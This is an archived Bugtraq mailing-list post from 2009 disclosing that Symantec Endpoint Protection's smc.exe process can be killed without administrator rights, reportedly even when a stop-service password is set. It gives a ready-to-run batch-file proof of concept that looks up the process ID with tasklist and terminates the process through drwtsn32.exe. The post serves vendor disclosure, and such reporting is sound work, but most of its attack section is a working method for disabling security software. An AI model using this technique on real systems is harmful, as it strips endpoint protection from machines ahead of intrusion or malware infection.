SEPKILL /im SMC.EXE /f

To: <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: SEPKILL /im SMC.EXE /f
From: "Sandeep Cheema" <51l3n7@xxxxxxx>
Date: Fri, 13 Feb 2009 18:18:08 +0530
Importance: Normal
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi,

Probably this bug exists on majorly all the software's but securitysoftware's like antivirus and firewall have to bucket it which is not whatits for SEP.I have tested it on all versions of SEP from 11.0.776 to 11.0.4000(XP and2k3)



You can kill smc.exe with the help of drwtsn32.exe in the following way.

drwtsn32 -p %pid%
where pid is the process id for smc.exe

POC:

Save the following as a batch file and execute it

tasklist | find /i "Smc.exe" > c:\pid.txt
FOR /F "tokens=2" %%R IN ('TYPE "c:\pid.txt"') DO SET pidopt=%%R
drwtsn32 -p %pidopt%



You don't need admin privilege for this exploit.

This will even bypass the password if it has been set to stop the service.

If executed from the command line in the form drwtsn32 -p %pid% , thecommand will be executed and it takes some time for the process to bestopped.If done from a batch file the command is completed only when the process isstopped.


Regards, Sandeep
51l3n7[at]live.in

Prev by Date: Re: RE: SEP(Symantec) Bug
Next by Date: RE: SEP(Symantec) Bug
Previous by thread: Security Assessment of the Transmission Control Protocol (TCP)
Next by thread: Re: SEPKILL /im SMC.EXE /f
Index(es):
- Date
- Thread